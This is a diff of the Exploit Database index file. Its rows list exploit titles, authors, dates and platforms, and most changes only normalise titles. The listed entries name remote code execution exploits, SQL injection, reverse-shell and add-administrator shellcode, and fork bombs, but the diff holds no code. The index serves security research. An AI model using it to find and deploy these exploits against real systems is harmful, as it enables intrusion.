@ -10516,7 +10519,7 @@ id,file,description,date,author,platform,type,port
|
|||
9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0
|
||||
9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0
|
||||
9093,platforms/windows/remote/9093.txt,"Microsoft Windows Live Messenger Plus! Fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0
|
||||
9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - JSP Source Viewing",2009-07-09,kingcope,windows,remote,0
|
||||
9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 - .JSP Source Viewing",2009-07-09,kingcope,windows,remote,0
|
||||
9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution",2009-07-10,"Secure Network",windows,remote,0
|
||||
9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0
|
||||
9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0
|
||||
|
|
@ -11928,7 +11931,6 @@ id,file,description,date,author,platform,type,port
|
|||
19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
|
||||
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
|
||||
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
|
||||
19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
|
||||
|
|
@ -13201,7 +13203,7 @@ id,file,description,date,author,platform,type,port
|
|||
23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
|
||||
23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Unauthenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0
|
||||
23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0
|
||||
23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0
|
||||
23083,platforms/windows/remote/23083.txt,"MySQL - 'Stuxnet Technique' Windows Remote System Exploit",2012-12-02,kingcope,windows,remote,0
|
||||
23091,platforms/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 - Mail Server Full Path Disclosure",2003-09-02,"Ziv Kamir",windows,remote,0
|
||||
23092,platforms/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 - Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",windows,remote,0
|
||||
23093,platforms/windows/remote/23093.txt,"Microsoft Windows XP - TCP Packet Information Leakage",2003-09-02,"Michal Zalewski",windows,remote,0
|
||||
|
|
@ -14151,7 +14153,7 @@ id,file,description,date,author,platform,type,port
|
|||
29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80
|
||||
29302,platforms/linux/remote/29302.txt,"Mono XSP 1.x/2.0 - Source Code Information Disclosure",2006-12-20,jose.palanco,linux,remote,0
|
||||
29316,platforms/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner)",2013-10-31,noptrix,php,remote,0
|
||||
29319,platforms/php/remote/29319.rb,"vTigerCRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80
|
||||
29319,platforms/php/remote/29319.rb,"vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80
|
||||
29320,platforms/php/remote/29320.rb,"NAS4Free - Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80
|
||||
29321,platforms/linux/remote/29321.rb,"Zabbix - Authenticated Remote Command Execution (Metasploit)",2013-10-31,Metasploit,linux,remote,80
|
||||
29322,platforms/php/remote/29322.rb,"ISPConfig - Authenticated Arbitrary PHP Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80
|
||||
|
|
@ -14364,7 +14366,7 @@ id,file,description,date,author,platform,type,port
|
|||
30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
|
||||
30781,platforms/osx/remote/30781.txt,"Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0
|
||||
31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate - CRLF Characters URL Filtering Bypass",2008-01-14,Danux,hardware,remote,0
|
||||
30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment - Arbitrary File Upload (Metasploit)",2014-01-07,Metasploit,php,remote,80
|
||||
30787,platforms/php/remote/30787.rb,"vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)",2014-01-07,Metasploit,php,remote,80
|
||||
30816,platforms/windows/remote/30816.py,"Autonomy KeyView Lotus 1-2-3 - File Multiple Buffer Overflow Vulnerabilities",2007-11-26,Sebastian,windows,remote,0
|
||||
30819,platforms/windows/remote/30819.c,"Tencent QQ 2006 LaunchP2PShare - Multiple Stack Buffer Overflow Vulnerabilities",2007-11-27,axis,windows,remote,0
|
||||
30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - My.Logon.php3 Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0
|
||||
|
|
@ -15887,6 +15889,7 @@ id,file,description,date,author,platform,type,port
|
|||
42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
|
||||
42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
|
||||
42949,platforms/linux/remote/42949.txt,"UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution",2017-10-02,agix,linux,remote,0
|
||||
42952,platforms/windows/remote/42952.py,"ERS Data System 1.8.1 - Java Deserialization",2017-09-21,"West Shepherd",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
|
@ -16293,7 +16296,7 @@ id,file,description,date,author,platform,type,port
|
|||
15063,platforms/win_x86/shellcode/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode,0
|
||||
15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
|
||||
15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0
|
||||
15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
|
||||
15202,platforms/win_x86/shellcode/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
|
||||
15203,platforms/win_x86/shellcode/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
|
||||
15314,platforms/arm/shellcode/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
|
||||
15315,platforms/arm/shellcode/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
|
||||
|
|
@ -16530,12 +16533,12 @@ id,file,description,date,author,platform,type,port
|
|||
42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
|
||||
42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0
|
||||
42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
|
||||
42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
|
||||
42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
|
||||
42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
|
@ -17470,7 +17473,7 @@ id,file,description,date,author,platform,type,port
|
|||
2505,platforms/php/webapps/2505.txt,"JASmine 0.0.2 - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0
|
||||
2506,platforms/php/webapps/2506.txt,"Foafgen 0.3 - 'redir.php' Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0
|
||||
2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0
|
||||
2508,platforms/php/webapps/2508.txt,"vtiger CRM 4.2 - (calpath) Multiple Remote File Inclusion",2006-10-10,the_day,php,webapps,0
|
||||
2508,platforms/php/webapps/2508.txt,"vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusion",2006-10-10,the_day,php,webapps,0
|
||||
2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - 'photo_comment.php' File Inclusion",2006-10-10,Kacper,php,webapps,0
|
||||
2510,platforms/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - 'import.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
|
||||
2511,platforms/php/webapps/2511.txt,"PHPLibrary 1.5.3 - 'grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
|
||||
|
|
@ -21567,7 +21570,7 @@ id,file,description,date,author,platform,type,port
|
|||
8395,platforms/php/webapps/8395.txt,"RedaxScript 0.2.0 - 'Language' Local File Inclusion",2009-04-10,SirGod,php,webapps,0
|
||||
8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0
|
||||
8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0
|
||||
8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
|
||||
8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - 'level' Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
|
||||
8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0
|
||||
8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0
|
||||
8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps,0
|
||||
|
|
@ -22205,7 +22208,7 @@ id,file,description,date,author,platform,type,port
|
|||
9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0
|
||||
9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0
|
||||
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
|
||||
9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
|
||||
9450,platforms/php/webapps/9450.txt,"vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
|
||||
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
|
|
@ -24745,7 +24748,7 @@ id,file,description,date,author,platform,type,port
|
|||
15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0
|
||||
15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0
|
||||
15175,platforms/php/webapps/15175.txt,"Chipmunk Board 1.3 - 'index.php?forumID' SQL Injection",2010-10-01,Shamus,php,webapps,0
|
||||
15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure (Python)",2010-10-04,ZoRLu,asp,webapps,0
|
||||
15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure",2010-10-04,ZoRLu,asp,webapps,0
|
||||
15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps,0
|
||||
15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
|
||||
15185,platforms/asp/webapps/15185.txt,"SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0
|
||||
|
|
@ -25241,7 +25244,7 @@ id,file,description,date,author,platform,type,port
|
|||
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
|
||||
16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0
|
||||
16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
|
||||
16280,platforms/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
|
||||
16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0
|
||||
41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0
|
||||
16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0
|
||||
|
|
@ -26088,7 +26091,7 @@ id,file,description,date,author,platform,type,port
|
|||
18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
|
||||
18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST Cross-Site Request Forgery",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
|
||||
18768,platforms/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",php,webapps,0
|
||||
18770,platforms/php/webapps/18770.txt,"vtiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0
|
||||
18770,platforms/php/webapps/18770.txt,"vTiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0
|
||||
18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0
|
||||
18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,php,webapps,0
|
||||
18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection",2012-04-24,G13,php,webapps,0
|
||||
|
|
@ -26615,9 +26618,9 @@ id,file,description,date,author,platform,type,port
|
|||
21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0
|
||||
21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Full Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0
|
||||
21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor (Metasploit)",2012-10-10,Metasploit,php,webapps,0
|
||||
21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0
|
||||
21742,platforms/php/webapps/21742.txt,"template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0
|
||||
21743,platforms/php/webapps/21743.txt,"phpmybittorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0
|
||||
21740,platforms/php/webapps/21740.txt,"phpMyChat Plus 1.94 RC1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0
|
||||
21742,platforms/php/webapps/21742.txt,"Template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0
|
||||
21743,platforms/php/webapps/21743.txt,"phpMyBitTorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0
|
||||
21744,platforms/windows/webapps/21744.txt,"Novell Sentinel Log Manager 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",windows,webapps,0
|
||||
21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",php,webapps,0
|
||||
21755,platforms/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",php,webapps,0
|
||||
|
|
@ -29095,9 +29098,9 @@ id,file,description,date,author,platform,type,port
|
|||
26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 - review.php sbres_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0
|
||||
26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0
|
||||
26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0
|
||||
26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module - record Parameter Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0
|
||||
26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0
|
||||
26586,platforms/php/webapps/26586.txt,"vtiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0
|
||||
26584,platforms/php/webapps/26584.txt,"vTiger CRM 4.2 Leads Module - 'record' Parameter Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0
|
||||
26585,platforms/php/webapps/26585.txt,"vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0
|
||||
26586,platforms/php/webapps/26586.txt,"vTiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0
|
||||
26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,php,webapps,0
|
||||
26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
|
||||
26589,platforms/php/webapps/26589.txt,"OvBB 0.x - thread.php threadid Parameter SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
|
||||
|
|
@ -29292,7 +29295,7 @@ id,file,description,date,author,platform,type,port
|
|||
26810,platforms/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php' album Parameter SQL Injection",2005-12-13,r0t,php,webapps,0
|
||||
26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - Advertiser_statistic.php SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
|
||||
26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
|
||||
26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - View_Results.php SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
|
||||
26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
|
||||
26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0
|
||||
26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0
|
||||
26818,platforms/php/webapps/26818.txt,"News Module for Envolution - modules.php Multiple Parameter Cross-Site Scripting",2005-12-14,X1ngBox,php,webapps,0
|
||||
|
|
@ -29667,7 +29670,7 @@ id,file,description,date,author,platform,type,port
|
|||
27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection",2013-08-02,Raw-x,php,webapps,0
|
||||
27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0
|
||||
27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
|
||||
27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
|
||||
27279,platforms/php/webapps/27279.txt,"vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
|
||||
27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0
|
||||
27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0
|
||||
27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0
|
||||
|
|
@ -30438,7 +30441,7 @@ id,file,description,date,author,platform,type,port
|
|||
28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
|
||||
28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
|
||||
28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0
|
||||
28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
|
||||
28409,platforms/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0
|
||||
28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0
|
||||
28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0
|
||||
28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
|
||||
|
|
@ -30471,8 +30474,8 @@ id,file,description,date,author,platform,type,port
|
|||
28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0
|
||||
28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0
|
||||
28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - 'admin/newsletters.php' page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - admin/orders_status.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - admin/products_attributes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
